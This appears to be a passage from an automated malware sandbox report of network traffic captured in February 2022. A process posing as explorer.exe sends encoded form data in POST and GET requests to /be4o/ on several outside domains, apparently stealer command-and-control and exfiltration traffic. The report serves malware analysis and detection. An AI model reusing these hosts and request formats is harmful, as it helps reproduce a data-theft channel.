                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 39 4f 79 78 28 48 43 58 62 79 74 53 50 66 65 61 58 54 70 73 7e 53 6b 31 4e 45 32 4a 34 6d 4a 55 63 66 30 45 4d 58 6d 78 64 54 48 56 7e 64 39 32 79 44 68 56 35 6b 4e 4f 79 53 71 30 4d 66 6f 67 78 4c 72 51 70 30 5a 79 56 53 34 55 52 77 43 71 6d 54 68 67 6f 41 65 5a 73 62 65 47 61 4c 30 56 4d 43 58 31 74 48 57 48 47 54 6d 57 71 78 35 52 6d 53 4b 64 67 33 68 68 38 6a 7a 41 51 6d 31 74 62 35 7e 6f 58 78 58 78 36 31 6a 48 39 62 77 6f 68 4e 73 77 79 74 59 30 56 4a 56 4a 59 63 34 30 72 63 75 53 34 33 62 5a 71 31 49 4f 55 33 28 31 6f 6a 28 43 33 62 6e 75 49 35 42 6e 68 74 64 74 71 67 58 53 33 50 76 73 73 7a 33 65 39 70 51 44 61 53 59 65 74 68 76 52 59 45 58 76 34 7a 51 64 30 63 69 63 38 41 77 43 74 33 33 34 4d 41 70 67 62 4e 78 72 75 53 70 69 76 45 58 31 46 74 7a 79 50 70 74 74 65 49 28 45 32 50 53 48 50 68 41 6d 74 32 6f 53 6e 37 68 4c 6d 75 65 44 48 67 39 30 66 31 45 77 51 36 32 44 35 57 38 53 43 5a 59 74 45 4f 28 43 58 74 32 70 6d 62 49 6c 44 49 52 66 58 62 56 6c 41 4a 68 4a 74 71 62 65 68 37 63 66 69 45 35 71 4b 47 35 69 4b 6c 50 44 38 32 71 51 7a 77 30 54 6c 66 66 63 4f 69 37 6e 53 37 39 49 41 6c 53 53 6b 33 67 47 42 66 75 61 70 47 44 4e 7a 30 49 51 36 70 30 78 5a 52 6b 38 53 72 50 59 75 72 4f 30 57 37 64 46 30 56 6c 76 30 2d 46 2d 59 44 51 74 62 42 45 53 36 50 46 4e 6a 47 37 71 4a 2d 49 39 67 62 65 67 63 5a 64 77 6a 62 6b 74 76 4e 53 66 4d 75 35 67 73 5f 44 56 34 59 6c 63 50 41 30 6f 51 38 46 79 63 69 68 33 37 36 6c 38 33 48 79 68 37 30 79 2d 50 64 75 51 59 73 37 77 69 73 41 79 56 38 6d 5a 37 64 4f 32 6f 32 72 6d 76 67 30 47 36 50 6e 62 69 35 4d 32 78 46 4f 48 50 64 69 53 36 74 47 30 58 4a 46 63 74 78 56 67 51 6b 34 64 50 75 49 75 55 35 69 55 74 70 57 55 71 43 74 4f 45 35 31 57 77 31 4b 48 79 43 65 4e 4d 56 6a 75 6d 70 41 4d 7a 35 66 39 62 65 58 44 68 6d 65 74 63 59 4d 5a 45 44 4a 6b 50 46 6c 4b 63 34 56 34 68 38 79 51 46 68 6a 32 75 6e 78 33 4e 52 6f 76 76 54 38 33 6e 34 49 45 6b 34 61 70 45 45 75 33 37 34 46 74 52 7a 4c 2d 34 6e 44 6f 36 50 35 79 4d 4b 77 74 30 4f 7e 4e 6e 67 30 6f 72 51 30 39 46 47 73 66 53 45 63 6f 79 73 34 52 47 33 43 52 75 6d 35 41 71 6e 73 58 41 5f 41 59 6e 49 63 65 4d 50 54 6b 64 31 32 70 67 50 50 51 42 6f 71 66 44 39 67 31 5a 37 73 73 36 7a 6b 51 42 2d 30 58 37 4b 6a 39 44 71 54 45 68 4b 6f 4d 4d 64 37 73 4b 54 76 37 78 5f 53 58 41 4e 56 68 41 37 4f 55 67 32 78 6b 44 4d 66 7a 45 6c 67 4f 46 51 6f 66 45 53 64 35 6f 4c 4a 33 32 31 77 48 66 5f 6e 55 71 35 58 68 6d 36 6a 55 53 63 38 58 65 68 28 51 5a 4a 39 69 58 53 36 63 56 6c 6a 64 70 70 6f 4d 7e 43 6c 4c 54 77 42 64 48 30 28 76 7a 36 51 52 7e 32 46 30 44 69 59 64 75 47 36 45 43 6f 46 4e 73 59 78 34 74 4e 76 4b 31 65 4a 66 72 61 78 48 5a 35 49 77 36 2d 33 45 42 71 79 6b 48 47 4c 75 50 46 6b 4e 5a 74 6e 64 61 66 28 58 67 77 4d 72 53 5f 70 72 38 70 41 49 69 33 56 45 6d 4d 62 68 75 41 36 4c 4c 64 33 5f 54 75 43 7a 58 5f 42 6e 71 53 43 6f 36 45 63 58 28 4c 50 42 6e 6c 58 47 62 43 78 55 7e 2d 4d 44 33 52 51 6a 36 42 48 39 49 38 7a 59 42 46 4e 44 59 61 67 6c 71 43 6b 76 32 49 5a 57 6a 79 53 75 47 4d 73 6c 58 57 53 73 54 49 46 41 51 55 55 41 51 53 6f 53 77 37 65 53 55 75 68 4d 55 78 45 33 64 37 69 4a 7e 43 6f 65 50 57 63 6f 44 6a 58 38 6b 61 6c 55 34 71 75 36 4b 6e 68 31 41 63 78 6f 37 79 55 4f 66 7a 61 59 79 46 34 50 4a 78 63 6e 45 74 70 6d 4c 64 67 70 47 73 44 76 30 5a 39 65 76 43 64 6a 51 4c 66 41 74 70 43 62 37 5a 38 4f 56 69 4d 4d 64 5f 52 57 34 72 58 53 64 70 36 37 59 65 7a 5f 51 4f 36 4d 33 65 6b 59 4b 4e 72 73 78 76 56 35 77 6b 76 67 43 61 64 6b 75 6d 36 70 6a 46 52 47 6a 4d 63 79 56 48 58 78 45 4e 38 68 49 38 63 4a 71 75 6d 49 52 34 67 33 50 31 75 5f 37 78 78 58 79 74 39 76 35 4d 41 65 61 6c 4b 76 57 46 64 54 45 56 6c 57 39 35 4c 72 53 43 4d 64 51 7a 4d 70 50 65 6c 6c 6e 59 64 75 76 59 35 65 4a 32 7a 55 65 68 79 37 35 79 6d 32 6d 35 30 6c 32 76 35 78 63 44 6f 62 5a 6c 46 50 33 6d 66 57 33 64 73 62 5a 68 30 71 7e 41 44 68 32 54 31 45 52 49 51 4f 71 47 4e 66 49 5a 75 65 34 38 7a 44 64 55 66 73 31 52 6a 50 77 53 61 6e 57 5a 77 48 38 63 65 74 6d 2d 6d 32 43 71 5a 78 51 6d 58 4f 4c 39 77 30 32 33 6d 79 55 4e 68 71 38 51 57 55 4b
                                                                                                                                                                                                                              Data Ascii: h48Hl=9Oyx(HCXbytSPfeaXTps~Sk1NE2J4mJUcf0EMXmxdTHV~d92yDhV5kNOySq0MfogxLrQp0ZyVS4URwCqmThgoAeZsbeGaL0VMCX1tHWHGTmWqx5RmSKdg3hh8jzAQm1tb5~oXxXx61jH9bwohNswytY0VJVJYc40rcuS43bZq1IOU3(1oj(C3bnuI5BnhtdtqgXS3Pvssz3e9pQDaSYethvRYEXv4zQd0cic8AwCt334MApgbNxruSpivEX1FtzyPptteI(E2PSHPhAmt2oSn7hLmueDHg90f1EwQ62D5W8SCZYtEO(CXt2pmbIlDIRfXbVlAJhJtqbeh7cfiE5qKG5iKlPD82qQzw0TlffcOi7nS79IAlSSk3gGBfuapGDNz0IQ6p0xZRk8SrPYurO0W7dF0Vlv0-F-YDQtbBES6PFNjG7qJ-I9gbegcZdwjbktvNSfMu5gs_DV4YlcPA0oQ8Fycih376l83Hyh70y-PduQYs7wisAyV8mZ7dO2o2rmvg0G6Pnbi5M2xFOHPdiS6tG0XJFctxVgQk4dPuIuU5iUtpWUqCtOE51Ww1KHyCeNMVjumpAMz5f9beXDhmetcYMZEDJkPFlKc4V4h8yQFhj2unx3NRovvT83n4IEk4apEEu374FtRzL-4nDo6P5yMKwt0O~Nng0orQ09FGsfSEcoys4RG3CRum5AqnsXA_AYnIceMPTkd12pgPPQBoqfD9g1Z7ss6zkQB-0X7Kj9DqTEhKoMMd7sKTv7x_SXANVhA7OUg2xkDMfzElgOFQofESd5oLJ321wHf_nUq5Xhm6jUSc8Xeh(QZJ9iXS6cVljdppoM~ClLTwBdH0(vz6QR~2F0DiYduG6ECoFNsYx4tNvK1eJfraxHZ5Iw6-3EBqykHGLuPFkNZtndaf(XgwMrS_pr8pAIi3VEmMbhuA6LLd3_TuCzX_BnqSCo6EcX(LPBnlXGbCxU~-MD3RQj6BH9I8zYBFNDYaglqCkv2IZWjySuGMslXWSsTIFAQUUAQSoSw7eSUuhMUxE3d7iJ~CoePWcoDjX8kalU4qu6Knh1Acxo7yUOfzaYyF4PJxcnEtpmLdgpGsDv0Z9evCdjQLfAtpCb7Z8OViMMd_RW4rXSdp67Yez_QO6M3ekYKNrsxvV5wkvgCadkum6pjFRGjMcyVHXxEN8hI8cJqumIR4g3P1u_7xxXyt9v5MAealKvWFdTEVlW95LrSCMdQzMpPellnYduvY5eJ2zUehy75ym2m50l2v5xcDobZlFP3mfW3dsbZh0q~ADh2T1ERIQOqGNfIZue48zDdUfs1RjPwSanWZwH8cetm-m2CqZxQmXOL9w023myUNhq8QWUKwYkjavKmeFM8wReuY4n1H~S(6H0S924KSdYdA(Gko5AEYMQPn2szr2WfxrTDJChe7uXjUpD38Q7gxbThvSy5YS8v2B5E43SlYcX~cOxiZjZM5oRb1~i~aS2MlSX1mgScpiolxggI3p56NO2Jkrxs9Cf2sYeFeohBv~1O7DOYKTVwNqgiwbfWAW8GpBSC4LFNFKUIW4z1SXrG9e1JRbrIX5eFJ2TQMrRK17KiDNl1b96yGwbGUnuy4NA1dqc8SLpQiO84TYeOPcVhI(KbI28sJtw8AQJlOSTaMowh5UFPRnz9ytgPCAzvWCJUek983KK1eiCnrKhAIxDV0I40hGUZ_XRQru09oklom2O3hdP~eyWFQW3GZ(HYoUPaYIwiD2RI9Caag3KV4bVlDV0g1NMxf8KTtK070wqjn7fnVep20xMa7eagV(dLhaCm_dOQUyjfvU7p8kR74~9LAZXUSnrb3G70WWKldY-hxMMdu6xVt7HU27LaGUYRWZhD04SvfOFc87be0pRvVP-6iYBfwkCpz~YmIU9r6w7WuGZuATjdz6MsdnVP8CL4QFbFZvmxO5EPpv3xMxVzHTwm83gL7KolJxLJ5gqPFaTO4mG~p7fytycWx4j0D60bn25(8O9W76H7T~xjEqETChSAyciR9gX5TrmK37AoB7cu5PGD84X2ZEiQ7j8BUCVJdUjHWCHjQw14zfBLscPO66bZUtTA4pHiEXxjXlG3w7qBZ8aguHxuopKbJdPHrjpnzCUsCiRagYOKYVPc8zHoQRFvPvjtS09RZZ7CWbA3eDFrAaOI7T2OZkd~-ElMUewDx1qFSVyCDR5BhEyKKTP~Vvda9FDD6FE4j8GHRm1UvBCH-DtPp~QL_QPw0vyWqVfaZi_6q84inzyu74dq-X7MPt
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.067214966 CET9074OUTData Raw: 52 50 6b 59 35 79 74 69 58 34 71 7e 43 69 68 47 34 78 33 56 77 37 36 44 34 65 35 4e 41 78 2d 6b 73 78 72 58 6a 70 6e 63 46 39 45 48 39 4e 34 38 5a 48 75 4d 49 6b 7a 53 37 58 63 78 35 48 55 75 4f 61 45 38 70 79 31 57 69 57 76 38 7a 4f 32 4b 58 30
                                                                                                                                                                                                                              Data Ascii: RPkY5ytiX4q~CihG4x3Vw76D4e5NAx-ksxrXjpncF9EH9N48ZHuMIkzS7Xcx5HUuOaE8py1WiWv8zO2KX0rr6F99d3YRuUaRemUQA7j~6nvXT0JqdTIqDRY~S91(u4xpRvmI0T4Y3Xz(W7WfMZWk82Gz-KpvwlDmc7j8n1JazJKS-TrUGa5tnBQ5MHEI23VY3FUXpwJr-EfQZAEI4dcA9edtl32hCP3~-dOrO2KKwn_mikvAZRk
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.067256927 CET9077OUTData Raw: 72 65 42 69 56 6b 46 52 6a 76 4b 59 55 6d 32 7a 33 4f 4e 7a 56 52 63 70 44 33 4d 36 67 77 61 4a 35 73 50 71 5a 64 67 75 51 4f 4a 42 69 4b 62 38 6b 75 7a 58 36 64 77 37 36 35 35 4a 61 73 32 42 6e 56 6f 7e 39 61 44 36 77 44 4f 64 4b 4c 70 48 72 35
                                                                                                                                                                                                                              Data Ascii: reBiVkFRjvKYUm2z3ONzVRcpD3M6gwaJ5sPqZdguQOJBiKb8kuzX6dw7655Jas2BnVo~9aD6wDOdKLpHr5_Lor5(H0I6D~dkENKDyboW1PYTvV4~9kOWHVvyFp73RVwjZipV1kgM1Xa8DSdDYK07NOQvf2N8ctgQyo7LJ93~tjJ8SJxLUnRPIazsSFjyZl9yPfdUwAAXnCN2neZJ9jkGOrcSBJJla97zOeeF_SWhACCLQVZqsd9
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233164072 CET9084OUTData Raw: 32 66 5a 44 6f 4e 77 7a 41 54 44 42 72 30 76 4d 68 6d 47 4a 49 4a 47 48 54 35 47 31 6c 4a 70 57 71 55 75 72 35 57 37 39 62 68 34 52 69 35 34 33 53 53 62 33 6e 6f 68 35 5a 35 46 58 46 59 37 7e 6d 6e 48 41 32 38 48 48 4b 6f 39 58 49 63 68 42 56 75
                                                                                                                                                                                                                              Data Ascii: 2fZDoNwzATDBr0vMhmGJIJGHT5G1lJpWqUur5W79bh4Ri543SSb3noh5Z5FXFY7~mnHA28HHKo9XIchBVuCNwzWi4scIqTKMAFnXCBCcvudENkWAGby4cNwai3w~xE3BgDaKxYelnb_VSOXKEiYss5-WPejPWSewvbGwO57NUwJ38xqwNjVsshsY5mX3wZZcc1Ska4XA2fD3wuXGyJu8Ewtq-piOnvPc3mLdxvNgUgw8gVdQEWU
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233232021 CET9088OUTData Raw: 32 28 59 41 77 76 66 58 4f 42 5f 76 4f 45 43 30 6f 7e 62 4e 31 4a 71 31 33 44 70 57 66 67 38 33 57 4d 52 68 70 57 6c 55 7a 75 6d 37 65 6d 79 74 4b 66 48 38 71 64 63 58 4b 65 31 36 75 43 4b 35 38 54 37 46 48 49 51 7e 62 48 4b 28 4d 35 61 31 4d 44
                                                                                                                                                                                                                              Data Ascii: 2(YAwvfXOB_vOEC0o~bN1Jq13DpWfg83WMRhpWlUzum7emytKfH8qdcXKe16uCK58T7FHIQ~bHK(M5a1MDEgbSklO2vk8Hee7tr6I1JROF1dwY56rGCxoxvLYuzXcr18v5rYfplinfURrxsbXyU3kMTg-Se2QSb2l6enic2bz0FheZ2qbGfHiijPOiudJdBYFGK0OF_OtP5IES1wlfeR4TQ~6M5luzPyWj8TtEZZNH6wkCpnoet
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233577967 CET9096OUTData Raw: 69 52 68 77 58 72 58 79 67 64 79 4a 59 4a 44 6f 6f 4b 56 73 64 7a 54 68 6c 4b 7a 4a 36 63 54 68 36 30 4f 6d 72 45 47 4f 69 6e 5a 74 6c 59 4e 59 6c 64 6c 52 56 32 69 44 45 70 6c 6f 32 38 4b 5a 31 37 68 65 39 41 63 56 64 30 69 57 64 7a 49 6e 4d 72
                                                                                                                                                                                                                              Data Ascii: iRhwXrXygdyJYJDooKVsdzThlKzJ6cTh60OmrEGOinZtlYNYldlRV2iDEplo28KZ17he9AcVd0iWdzInMrAVQ~WrXYDUyptDMhjSCEh4SCB8SJ77pA3pWSuALfZoN98UFv7Tb8C3XRv5BiTCS3uuvKbWyP9rFp5wjxfYN~W~a44k16SpDhfpkmYCPNpR1Tp01UjrqIRoZZqidDGnhkUSMkw0Z9I7rDUFOreF6nmXcNaexSAQBAP
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233733892 CET9101OUTData Raw: 4c 38 79 6f 61 28 6b 45 47 65 42 68 63 6d 5f 54 6d 45 48 4f 46 4c 4f 53 6e 35 75 77 4a 79 30 64 31 71 53 33 73 56 4e 44 76 59 44 48 44 7a 59 46 73 44 32 79 6c 6d 47 5a 70 78 4b 41 49 4b 41 41 72 39 63 79 63 48 35 78 4f 38 66 33 56 5a 77 50 38 7e
                                                                                                                                                                                                                              Data Ascii: L8yoa(kEGeBhcm_TmEHOFLOSn5uwJy0d1qS3sVNDvYDHDzYFsD2ylmGZpxKAIKAAr9cycH5xO8f3VZwP8~2yzbkc2oDY0afexHR2bX1czXQo7gVqwegR5jrsNxAwgbKVvfibs9bianXnELUVr3aj_2uWsIblvYwWbDriDG1gaZx6mbnO4hKeYn_3-nVJfeAplkpOKbvylhCMQGyXueDn8Ajm0LyTxe5MnN1cTb6oT2_uJiG7kJN
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.233879089 CET9104OUTData Raw: 51 6f 51 46 79 35 4a 65 6f 7e 63 4b 33 73 6d 64 36 39 58 41 41 39 4a 63 56 66 4d 76 58 44 78 4f 33 73 59 4e 5f 58 61 6c 59 55 74 54 5a 4f 78 71 47 41 35 4e 53 4d 5a 72 47 6f 63 6d 64 54 66 52 5a 67 6d 65 53 35 56 67 63 55 4e 57 6f 69 43 4c 42 4a
                                                                                                                                                                                                                              Data Ascii: QoQFy5Jeo~cK3smd69XAA9JcVfMvXDxO3sYN_XalYUtTZOxqGA5NSMZrGocmdTfRZgmeS5VgcUNWoiCLBJW4ThBin1t3JSBy89fTasJlNiptsrh(pOEGC3hJmLST9DBGJ7uJ0Rih7qZB7U-l_bkIBXbdP5b9vGk60thQxEvlkg1i-MmcixcyyuxiH9KByI0yuu7doV042QhWjlJ6NL1w7vwoeeXpnIhXK74jKtOApB2p01b886W
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.234543085 CET9104INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:06 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.quanqiu55555.com/be4o/
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              23192.168.11.204980638.143.0.8280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.225878000 CET9077OUTGET /be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmL HTTP/1.1
                                                                                                                                                                                                                              Host: www.quanqiu55555.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.384147882 CET9105INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:06 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.quanqiu55555.com/be4o/?h48Hl=yMGLhnyeH19jbN+jTVkumEksJ3u99HITZ4h1J3SKUgKf5+hZ4WRN7xEsij25EKwk4NjG&w6=ZbFDmL
                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              24192.168.11.2049809185.190.39.5280C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:16.538887978 CET9309OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.dreamintelligent.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.dreamintelligent.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.dreamintelligent.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 34 69 75 38 7e 4f 4b 6f 77 34 51 4d 7e 65 57 41 32 77 55 57 4d 68 62 79 66 62 31 5f 7e 76 43 62 70 64 31 4e 78 6b 55 49 46 4f 36 43 73 43 51 75 63 4c 55 67 53 5a 63 48 65 74 37 43 6f 4c 4b 37 31 4e 66 45 46 68 41 48 72 53 76 31 32 66 5a 70 50 30 76 35 74 72 56 48 59 4b 73 37 41 66 54 72 38 75 79 6b 4f 51 28 31 64 65 45 4a 35 46 53 7a 75 66 44 58 66 66 5a 75 7e 67 31 44 32 61 35 4e 42 69 75 70 38 50 6c 30 77 67 44 4d 77 6d 38 65 33 78 6f 42 39 6b 6f 63 61 53 67 4e 79 32 37 74 4f 57 73 5a 72 64 67 4d 55 34 32 6a 6a 37 5a 69 52 73 73 6d 76 68 53 79 59 59 6a 6c 71 51 35 6a 57 72 72 68 75 67 34 2d 39 5f 54 7a 64 5a 65 72 74 71 6d 46 38 4e 43 57 4c 65 50 4b 39 49 58 6c 75 66 37 54 6d 68 4e 38 74 48 43 43 71 42 51 46 76 38 70 55 4a 74 62 57 67 54 73 36 4b 61 58 73 6d 49 64 5f 72 73 4d 56 41 54 63 4f 74 38 6a 37 53 57 54 64 33 48 47 69 79 76 38 43 75 46 44 4a 59 38 72 6f 68 48 54 35 59 36 52 30 68 4f 6e 5a 38 62 66 65 67 63 51 73 6d 35 6d 41 7e 4f 77 73 28 73 44 71 6d 52 70 52 67 58 75 4d 37 32 63 46 42 30 6e 4b 34 38 50 38 39 66 77 73 35 59 46 73 54 61 28 49 6d 32 28 76 65 43 67 74 49 34 4b 64 42 63 70 55 4d 6c 52 71 43 65 42 50 51 36 54 68 6a 36 6e 2d 48 46 35 75 72 4e 43 41 53 62 4c 2d 44 52 36 41 53 65 6b 78 68 38 4e 75 4a 36 28 36 4a 54 63 54 42 45 6a 55 66 49 63 30 75 63 48 4c 30 62 6e 79 48 31 51 50 44 37 68 47 69 61 53 6b 52 48 34 7a 34 50 62 67 36 43 43 62 68 74 45 42 30 4f 69 50 63 56 43 73 4c 2d 32 42 45 61 69 4f 44 63 76 4d 31 72 61 4b 76 4d 70 31 76 76 67 6b 73 74 56 72 34 7a 36 39 34 7a 63 75 6a 63 30 74 63 67 64 55 79 77 69 48 50 6a 70 63 76 35 64 5f 7e 5f 56 52 48 38 72 42 31 2d 56 4e 7a 7a 36 31 72 54 61 5f 77 65 61 37 28 74 79 53 53 51 36 58 72 50 43 63 44 4e 72 34 37 79 46 4b 71 64 46 44 38 39 7a 74 58 47 50 54 7e 53 34 49 62 44 70 62 36 42 55 58 6b 49 49 6f 58 4d 69 45 73 78 74 51 6a 78 57 55 38 32 57 71 6e 6c 52 68 51 6c 63 4f 7e 51 51 49 31 2d 56 51 69 52 37 33 61 4a 78 47 6d 65 4b 56 56 63 46 4b 75 6b 52 42 48 4a 75 6c 48 44 28 44 68 52 44 41 46 43 59 4d 58 72 76 61 5a 75 78 39 73 49 44 6b 53 69 36 33 47 62 66 35 6d 65 58 67 28 50 74 57 43 4e 49 35 4d 69 4c 39 4b 5a 4f 59 61 63 4d 56 6d 53 54 4f 44 6d 6b 49 48 55 77 70 76 69 4e 34 46 54 30 49 58 77 74 76 58 51 45 54 31 4f 63 77 74 43 70 68 56 78 48 78 44 4c 46 55 6f 69 39 58 67 69 7e 4a 4d 5a 34 6e 65 37 57 6a 44 36 45 5a 67 71 67 53 4f 2d 73 52 75 65 35 77 6a 35 69 42 52 30 7a 56 48 4e 54 35 6e 51 61 6c 4d 76 34 49 33 38 6e 6f 4f 71 71 36 70 72 30 46 32 48 4f 48 71 30 64 34 50 72 51 66 54 65 62 33 6e 58 33 41 78 5f 77 65 50 47 45 6d 49 2d 4b 71 51 72 4f 6a 7e 2d 28 64 63 65 41 6c 4f 49 79 7a 50 4f 7e 58 38 62 38 5f 4d 61 34 76 7a 34 51 54 36 44 76 65 39 37 45 41 5a 52 35 66 4f 36 54 7a 54 49 31 5a 4a 53 7e 41 59 4e 41 42 58 59 75 52 4c 47 30 4f 55 34 35 55 35 64 38 30 71 67 70 33 32 62 7a 79 36 74 59 67 54 71 6e 6e 33 74 42 37 59 64 43 6e 50 7a 78 6b 78 50 51 4a 46 78 77 61 47 55 6f 76 78 4d 7e 47 30 67 73 4e 6c 4a 31 4b 64 6b 77 52 52 41 31 54 72 4f 4b 65 4f 56 65 46 71 6d 51 5f 6f 64 4d 5f 59 4d 62 6a 47 33 71 51 43 52 37 37 56 39 69 37 37 70 74 55 53 2d 74 63 37 2d 31 6a 48 6c 34 59 37 69 37 63 62 47 67 32 6d 61 57 45 44 75 4f 78 68 49 6d 55 28 44 46 35 32 69 76 5a 65 58 4a 4a 54 4b 49 63 51 37 56 73 6e 72 66 54 66 73 31 6f 79 55 6c 77 58 50 53 34 34 52 79 44 4b 77 5a 56 66 64 70 78 58 75 73 59 59 56 67 35 70 39 59 38 68 5a 4f 33 42 51 37 50 78 35 43 57 68 31 67 4f 45 58 79 72 66 66 72 70 65 70 78 63 4d 53 7e 4b 33 68 4c 7a 63 75 72 57 4c 45 63 7a 61 4f 7a 53 35 5a 56 6d 4f 5f 59 70 68 64 31 62 72 66 56 7a 47 30 6d 78 51 62 31 54 41 51 30 4e 47 4a 65 57 30 33 79 4d 59 34 61 39 5a 48 56 46 54 6f 63 74 33 6c 56 4c 28 77 58 43 30 33 75 4e 4d 76 68 61 47 32 4d 48 75 73 72 49 6e 4d 6d 64 32 4e 6f 57 31 55 36 63 53 73 4c 56 54 77 65 66 5a 61 70 68 4c 6a 4b 50 30 49 52 5a 78 55 64 4f 32 6f 62 67 38 30 65 2d 69 34 67 73 68 63 31 47 48 41 77 53 55 44 79 2d 6b 52 57 30 7e 65 55 63 50 7a 48 6e 36 65 7a 79 42 76 42 4f 4f 52 42 48 50 78 65 36 7e 4a 64 66 4d 58 4c 61 63 6b 44 57 61 5a 31 36 67 4d 62 30 62 55 4c 31 49 70 69 58 39 53 79 53 4c
                                                                                                                                                                                                                              Data Ascii: 